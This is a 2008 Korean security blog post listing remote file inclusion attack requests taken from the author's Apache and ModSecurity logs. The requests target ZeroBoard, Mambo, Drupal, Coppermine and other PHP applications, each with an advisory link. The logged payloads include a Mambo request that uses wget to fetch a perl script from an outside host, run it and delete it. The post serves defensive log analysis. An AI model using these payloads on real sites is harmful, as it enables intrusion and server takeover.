최근에 가장 많은 공격 빈도를 보이는 것은 zeroboard4 의 원격코드 실행 취약점 이고 다양한 웹프로그램에 대한
자동화된 공격(프로그램 내지 자동화된 스크립트 - php, perl)이 많이 보이고 있습니다.

apache 웹서버 로그와 modsecurity 로그에 남은 기록들을 기준으로 접근 방법과 관련 링크를 함께 적어보도록
하겠습니다. include하는특정 url의 파일은 악용될 소지가 있기때문에 필터링(?)했습니다. emoticon


ZeroBoard multiple vulnerabilities
관련링크: http://free4u.wo.tc/1682

GET //include/print_category.php?setup[use_category]=1&dir=http: //www.filtered.net/bbs//admin/safe1.txt???
GET //skin/zero_vote/error.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/login.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/setup.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
GET //skin/zero_vote/ask_password.php?dir=http ://www.filtered.pe/cnm/cache/tmp0/help0txt???
zero_vote 스킨의 취약점을 노린(?)공격인데 문제가 있는 파일 (ask_password.php, error.php, login.php, setup.php)을 차례로 공략(?)하는군요!


Net_DNS <= 0.3 (DNS/RR.php) Remote File Include Vulnerability
관련링크: http://www.securityfocus.com/bid/20666

GET //weblog/?search_target=tag&search_keyword=geoip//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt?? 
GET //sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt?? 

GET //weblog/?search_target=tag&search_keyword=geoip//sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??
GET //sources/libs/geoip/DNS/RR.php?phpdns_basedir=http ://filtered.com/catalog/images/default/iyes.txt??


PHP exploit using Drupal circulating
관련링크: http://drupal.org/node/184313

GET //drupal/?_menu[callbacks][1][callback]=http ://filtered.com/images/stories/id.txt? 




WebCalendar Send_Reminders.PHP Remote File Include Vulnerability
관련링크: http://www.securityfocus.com/bid/14651

GET //weblog/tools/send_reminders.php?noSet=0&includedir=http ://filtered.net/zeroboard/styles/test.txt??  


VWar 1.6.1 R2 Multiple Remote Vulnerabilities
관련링크: http://securitydot.net/vuln/exploits/vulnerabilities/articles/24766/vuln.html

GET  //vwar/war.php?action=http ://filtered.ru/administrator/templates/id.txt?? 


Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke
관련링크: http://www.securitytracker.com/alerts/2004/Apr/1010001.html

GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http ://www.filtered.de//contenido/cronjobs/id.txt?? 


4nalbum Module Cross-Site Scripting Attacks
관련링크: http://www.securitytracker.com/alerts/2004/Mar/1009449.html

GET //modules/4nAlbum/public/displayCategory.php?basepath=http ://filtered.ru/administrator/templates/id.txt??


Mambo Multiple Vulnerabilities
관련링크: http://archives.neohapsis.com/archives/bugtraq/2006-02/0463.html

GET //index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http
://www.filtered.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http ://www.filtered.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*?


Spider Friendly Module for phpBB File Inclusion Vulnerability
관련링크: http://www.frsirt.com/english/advisories/2006/4290

GET //admin/modules_data.php?phpbb_root_path=http ://h1.filtered.com/mocca69/id.txt?


perForms Remote File Inclusion
관련링크: http://securitytracker.com/alerts/2006/Jul/1016498.html

GET //?mosConfig_absolute_path=http ://filtered.co.uk/guestbook/es.txt??


XZero Community Classifieds Multiple File Inclusion, SQL Injection Vulnerabilities
관련링크: http://secwatch.org/advisories/1019879/

GET //config.inc.php?path_escape=http ://filtered.com/test.txt?


EQdkp Remote File Inclusion Vulnerability
관련링크: http://www.frsirt.com/english/advisories/2006/1693

GET //includes/dbal.php?eqdkp_root_path=http ://www.filtered.com//components/com_facileforms/strings.txt?


V-Webmail Remote File Include Vulnerability
관련링크: http://securitytracker.com/alerts/2006/May/1016160.html

GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http ://rooting.filtered.com/test.txt?




News Manager 2.0 Multiple Vulnerabilities
관련링크: http://www.milw0rm.com/exploits/download/5624

GET //ch_readalso.php?read_xml_include=http ://filtered.net/test.txt?



coppermine IFRAME inject Vulnerability
아래는 이곳에서도 사용중인 coppermine photo gallery(이하 CPG)의 최근 취약점에 관한것인데
아직은 CPG가 국내보다는 해외에서 많이 사용되고 있기 때문에 공격빈도가 그리 많지 않아 보입니다.
보안관련 사이트에서도 많이 다루고 있지 않는듯(현재 나온 취약점에 관한)해서 제목역시 제가 붙여 봤습니다.

관련링크 :
http://forum.coppermine-gallery.net/index.php/topic,51882.0.html
http://forum.coppermine-gallery.net/index.php/topic,51671.0.html

GET //coppermine/update.php
GET //coppermine/pluginmgr.php?op=upload
GET /coppermine/update.php HTTP/1.1" 200  - remote 유저가 update.php를 실행할수 있는 문제점이 있네요.
POST /coppermine/upload.php HTTP/1.1" 200  - 파일을 올리고 있습니다.

GET /coppermine/displayimage.php?album=lastup&cat=0&pos=0 - 업로드한것을 확인해 보는군요.
 

공격유형을 보면 javascript코드(obfuscated code) + php코드를 zip파일등으로 변경후(또는 jpg등의 이미지파일로) 업로드한뒤 실행 index.php파일을  변조해 특정 URL로 포워딩함.

CPG forum에서 hack당한 유저가 dump뜬 CPG의 db 파일을 열어보니 이미지 사이즈를 모두 1로 변경하고
보여지는 사진수도 1개로 수정하고 업로드시 거부 문자에서 #39를 제거 했군요.


기타 링크 : 최근 웹사이트 공격 유형 #2 http://free4u.wo.tc/9687


'Security' 카테고리의 다른 글

Safari update fixes "carpet bomb" flaw  (0) 2008.06.25
보안 관련 사이트 (mailling)  (0) 2008.06.16
최근 웹사이트 공격 유형  (2) 2008.05.09
phpMyAdmin security vulnerability  (0) 2008.05.06
rkhunter (rootkit hunter)  (0) 2008.04.22
Linux kernel Local Exploit  (0) 2008.02.13
  1. Favicon of http://free4u.dnip.net/ BlogIcon first4you 2008.05.11 15:49

    시간나는 대로 제가 사용중인 modesecurity를 이용한 차단 rule을 추가해 보겠습니다.

  2. Favicon of http://free4u.dnip.net/ BlogIcon EcusE 2008.06.02 01:11

    좀더 자세하고 다양한 공격패턴을 볼수 있는 ossec.net의 링크입니다.http://www.ossec.net/wiki/index.php/WebAttacks_links#Sites_with_PHP.2FPerl_scripts

+ Recent posts